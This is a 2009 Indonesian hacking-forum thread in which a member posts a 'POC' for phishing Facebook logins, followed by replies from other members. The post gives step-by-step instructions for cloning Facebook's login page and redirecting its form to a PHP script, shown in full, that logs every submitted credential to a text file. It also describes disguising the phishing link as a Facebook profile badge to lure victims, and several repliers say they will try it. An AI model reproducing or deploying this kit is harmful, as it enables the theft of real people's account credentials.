Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

[POC] simple idea fakelogin facebook

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

[POC] simple idea fakelogin facebook

Postby Xshadow » Fri Aug 28, 2009 2:51 am

dibutuhkan sedikit kesabaran untuk mencari hasil "tangkapan" dari kail yang kita pasang... :)

recruitment:
- text editor (notepad, wordpad, editplus, geany, notepad++, dll)
- ketelitian
- kesabaran :)
- hosting gratisan atau hasil inject


Concept...
kita gunakan "badge" facebook :)
kemudian edit/setting sebagus mungkin badge anda, kemudian kita buat untuk umpan :)

ok langsung saja...
1. kita buat fake login-nya :)
- logout facebook anda terlebih dahulu
- buka halaman depan facebook
- view source
- copy source
- paste source di editor (saya menggunakan editplus)
- cari "method",
- method="post" ganti dengan method="get"
- cari "action"
- action="URLasli" ganti dengan action="log.php"
- simpan dalam bentuk html ex: index.html
2. buat file log.php
isinya:
Code: Select all
<?php
header("Location: ");
$handle =
fopen("passwords.txt", "a");
foreach($_GET as
$variable => $value) {
fwrite($handle,
$variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle,
"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

ganti header("Location: "); dengan header("Location:http://xxx.com");
dimana maksud dari code tersebut yaitu ketika target meng-klik "Login/Masuk" maka dia akan redirect ke url tersebut

ganti juga password.txt dengan nama terserah
simpan file log.php :)

2. buka facebook anda dan login :)
3. masuk ke url ini http://www.facebook.com/facebook-widget ... badges.php
4. atur secantik mungkin :P FINISH?!?!?
5. ambil code-nya
misal :
Code: Select all
   <!-- Facebook Badge START -->
   <a href="http://www.facebook.com/xshadow" title="Satya Permana Putra" target="_TOP"
   style="font-family: &quot;lucida grande&quot;,tahoma,verdana,arial,sans-serif;
   font-size: 11px; font-variant: normal; font-style: normal; font-weight: normal;
   color: #3B5998; text-decoration: none;">
   <img src="http://www.facebook.com/badge.php?id=1263018894&amp;bid=210&amp;key=1299911766&amp;format=png&amp;z=1070161121"
   alt="http://www.facebook.com/badge.php?id=1263018894&amp;bid=210&amp;key=1299911766&amp;format=png&amp;z=1070161121"/></a>
   <!-- Facebook Badge END -->
   

nah url http://www.facebook.com/xshadow diganti dengan url fake login anda :D moga2 aja target gak tau :p

6. pasang code diatas di web anda... di forum anda... tapi ingat... ABC (Arena Bocah CukDu$), gak tanggung jawab :P
[X]perimental [S]ynthetic [H]umanoid [A]ssembled for [D]estruction and [O]nline [W]arfare
User avatar
Xshadow
 
Posts: 482
Joined: Thu May 31, 2007 8:01 pm
Location: http://captureflags.com

Re: [POC] simple idea fakelogin facebook

Postby blocko20 » Fri Aug 28, 2009 7:33 am

thx's master atas inponya... :mrgreen: :mrgreen:

segera dipraktekin..
User avatar
blocko20
 
Posts: 6
Joined: Thu Jan 24, 2008 6:42 am

Re: [POC] simple idea fakelogin facebook

Postby papa ieone » Fri Aug 28, 2009 7:56 am

Mantabs
User avatar
papa ieone
 
Posts: 6
Joined: Sat Sep 06, 2008 1:45 pm
Location: C:\>

Re: [POC] simple idea fakelogin facebook

Postby vodork » Fri Aug 28, 2009 11:24 am

wew mantabs om
matur nuwun yak
praktek
.::[tresno jalaran saking kulino]::.

.::[nek wes kullino]::.

.::[karepmu]::.
User avatar
vodork
 
Posts: 191
Joined: Wed Jun 10, 2009 1:52 am
Location: jogja/sarkem

Re: [POC] simple idea fakelogin facebook

Postby defacement88 » Fri Aug 28, 2009 11:29 am

we'i kucink unjuk taring&cakar :mrgreen:
Image
defacement88
 
Posts: 17
Joined: Tue Jul 21, 2009 11:54 am

Re: [POC] simple idea fakelogin facebook

Postby herman_pick » Fri Aug 28, 2009 9:19 pm

langsung ke TKP om..... :arrow: :arrow: :arrow:


Thankz om atas infonya... :roll: :roll:

nice share.. :mrgreen: :mrgreen: :mrgreen:
herman_pick
 
Posts: 27
Joined: Fri Jan 16, 2009 7:23 pm

Re: [POC] simple idea fakelogin facebook

Postby Darkzzzz » Sun Aug 30, 2009 5:36 am

Cukdus negh ^^ QRen om ... :mrgreen:
Qira" cara social engineeringnya yg tpt gmn y om? :?:
Mslh utamanya kan URL nya :D
Trs itu kan pke metode href alias anchor klo gk sala namanya, so... Org kan gk sembarangan nge-klik :|
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.

Re: [POC] simple idea fakelogin facebook

Postby cextor » Mon Oct 05, 2009 6:45 pm

keren2 .
mksh kk inpo nya :D :D
Jangan berkomentar/bertanya sebelum membaca dan mencoba . mencoba bukanlah hal yang menakutkan . Menakutkan belum berarti bisa membunuh kita . Kita adalah manusia yang mempunyai akal dan pikiran . Gunakanlah akal dan pikiran baru berkomentar .
User avatar
cextor
 
Posts: 7
Joined: Mon Oct 05, 2009 6:22 pm

Re: [POC] simple idea fakelogin facebook

Postby adietXcode » Sat Oct 31, 2009 1:11 am

seep juragan....
tapi gan gak ada cara laen selaen pasang di web ya, di FBnya mungkin, kaya dulu waktu ngerjain prenster :lol: :lol: :lol:

btw, Xshadow pa kabar neh, lama tak jumpa... :mrgreen:
"SAYA HANYA NEWBIE yang ingin belajar belajar dan belajar"

ImageImage
User avatar
adietXcode
 
Posts: 8
Joined: Fri Jan 09, 2009 10:48 am
Location: cirebon

leave a comment

Next

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 17 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id